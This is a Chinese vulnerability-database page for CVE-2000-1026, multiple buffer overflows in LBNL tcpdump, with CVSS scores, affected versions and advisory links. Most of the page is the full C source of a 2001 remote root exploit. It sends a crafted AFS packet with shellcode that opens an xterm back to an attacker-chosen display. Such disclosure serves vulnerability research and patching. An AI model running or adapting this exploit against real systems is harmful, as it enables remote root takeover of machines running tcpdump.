CVE-2000-1026
CVSS10.0
发布时间 :2000-12-11 00:00:00
修订时间 :2008-09-05 16:22:28
NMCOE    

[原文]Multiple buffer overflows in LBNL tcpdump allow remote attackers to execute arbitrary commands.


[CNNVD]LBNL tcpdump多个缓冲区溢出漏洞(CNNVD-200012-079)

        LBNL tcpdump存在多个缓冲区溢出漏洞。远程攻击者可以执行任意命令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:lbl:tcpdump:3.5_alpha
cpe:/a:lbl:tcpdump:3.4a6
cpe:/a:lbl:tcpdump:3.5
cpe:/a:lbl:tcpdump:3.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1026
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1026
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-079
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1870
(VENDOR_ADVISORY)  BID  1870
http://xforce.iss.net/xforce/xfdb/5480
(UNKNOWN)  XF  tcpdump-afs-packet-overflow(5480)
http://archives.neohapsis.com/archives/linux/suse/2000-q4/0681.html
(UNKNOWN)  SUSE  SuSE-SA:2000:46
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:61.tcpdump.v1.1.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:61

- 漏洞信息

LBNL tcpdump多个缓冲区溢出漏洞
危急 缓冲区溢出
2000-12-11 00:00:00 2006-11-14 00:00:00
远程  
        LBNL tcpdump存在多个缓冲区溢出漏洞。远程攻击者可以执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20337)

tcpdump 3.4/3.5 AFS ACL Packet Buffer Overflow Vulnerability (EDBID:20337)
unix remote
2001-01-02 Verified
0 Zhodiac
N/A [点击下载]
source: http://www.securityfocus.com/bid/1870/info

tcpdump is a popular network monitoring tool used for watching network traffic written by the Lawrence Berkeley Laboratory. It must at least begin execution as root since it opens and reads from the link layer interface (through pcap). It is usually run directly by/as root. 

tcpdump is vulnerable to a remotely exploitable buffer overflow in it's parsing of AFS ACL packets. This is likely the result of the AFS packet fields received over a network interface being copied into memory buffers of predefined length without checks for size. The excessive data could be used to overwrite stack variables if constructed correctly and allow the attacker (who would have sent the custom ACL packets) to gain remote access to the victim host. 

Exploitation of this vulnerability would likely yield root access for the perpetrator.

   /*
    * Tcpdump remote root xploit (3.5.2) (with -s 500 or higher)
    * for Linux x86
    *
    * By: Zhodiac <zhodiac@softhome.net>
    *
    * !Hispahack Research Team
    * http://hispahack.ccc.de
    *
    * This xploit was coded only to prove it can be done :)
    *
    * As usual, this xploit is dedicated to [CrAsH]]
    * She is "the one" and "only one" :***************
    *
    * #include <standar/disclaimer.h>
    *
    * Madrid 2/1/2001
    *
    * Spain r0x
    *
    */

    #include <stdio.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    #define ADDR			0xbffff248
    #define OFFSET			0
    #define NUM_ADDR			10
    #define NOP				0x90
    #define NUM_NOP			100

    #define RX_CLIENT_INITIATED     1
    #define RX_PACKET_TYPE_DATA     1
    #define FS_RX_DPORT             7000
    #define FS_RX_SPORT             7001
    #define AFS_CALL                134

    struct rx_header {
        u_int32_t epoch;
        u_int32_t cid;
        u_int32_t callNumber;
        u_int32_t seq;
        u_int32_t serial;
        u_char type;
        u_char flags;
        u_char userStatus;
        u_char securityIndex;
        u_short spare;
        u_short serviceId;
    };

    char shellcode[] = /* By Zhodiac <zhodiac@softhome.net> */
      "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"
      "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"
      "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"
      "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"
      "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"
      "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"
      "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"
      "\xff\xff\xff"
      "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";

    long resolve(char *name) {
     struct hostent *hp;
     long ip;

     if ((ip=inet_addr(name))==-1) {
       if ((hp=gethostbyname(name))==NULL) {
            fprintf (stderr,"Can't resolve host name [%s].\n",name);
            exit(-1);
          }
        memcpy(&ip,(hp->h_addr),4);
        }
     return(ip);
    }


    int main (int argc, char *argv[]) {

     struct sockaddr_in addr,sin;
     int sock,aux, offset=OFFSET;
     char buffer[4048], *chptr;
     struct rx_header *rxh;
     long int *lptr, return_addr=ADDR;


      fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n");
      fprintf(stderr,"Tcpdump 3.5.2 xploit by Zhodiac <zhodiac@softhome.net>\n\n");


      if (argc<3) {
        printf("Usage: %s <host> <display> [offset]\n",argv[0]);
        exit(-1);
        }

      if (argc==4) offset=atoi(argv[3]);
      return_addr+=offset;

      fprintf(stderr,"Using return addr: %#x\n",return_addr);

      addr.sin_family=AF_INET;
      addr.sin_addr.s_addr=resolve(argv[1]);
      addr.sin_port=htons(FS_RX_DPORT);

      if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {
         perror("socket()");
         exit(-1);
         }

      sin.sin_family=AF_INET;
      sin.sin_addr.s_addr=INADDR_ANY;
      sin.sin_port=htons(FS_RX_SPORT);

      if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
          perror("bind()");
          exit(-1);
          }

      memset(buffer,0,sizeof(buffer));
      rxh=(struct rx_header *)buffer;

      rxh->type=RX_PACKET_TYPE_DATA;
      rxh->seq=htonl(1);
      rxh->flags=RX_CLIENT_INITIATED;

      lptr=(long int *)(buffer+sizeof(struct rx_header));
      *(lptr++)=htonl(AFS_CALL);
      *(lptr++)=htonl(1);
      *(lptr++)=htonl(2);
      *(lptr++)=htonl(3);

      *(lptr++)=htonl(420);
      chptr=(char *)lptr;
      sprintf(chptr,"1 0\n");
      chptr+=4;

      memset(chptr,'A',120);
      chptr+=120;
      lptr=(long int *)chptr;
      for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
      chptr=(char *)lptr;
      memset(chptr,NOP,NUM_NOP);
      chptr+=NUM_NOP;
      shellcode[30]=(char)(46+strlen(argv[2]));
      memcpy(chptr,shellcode,strlen(shellcode));
      chptr+=strlen(shellcode);
      memcpy(chptr,argv[2],strlen(argv[2]));
      chptr+=strlen(argv[2]);

      sprintf(chptr," 1\n");

      if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) {
         perror("send()");
         exit(-1);
         }

      fprintf(stderr,"Packet with Overflow sent, now wait for the xterm!!!! :)\n\n");

      close(sock);
      return(0);
     }

   ------- tcpdump-xploit.c ----------		

- 漏洞信息

1624
tcpdump AFS ACL Packet Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-10-31 Unknow
2001-10-31 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站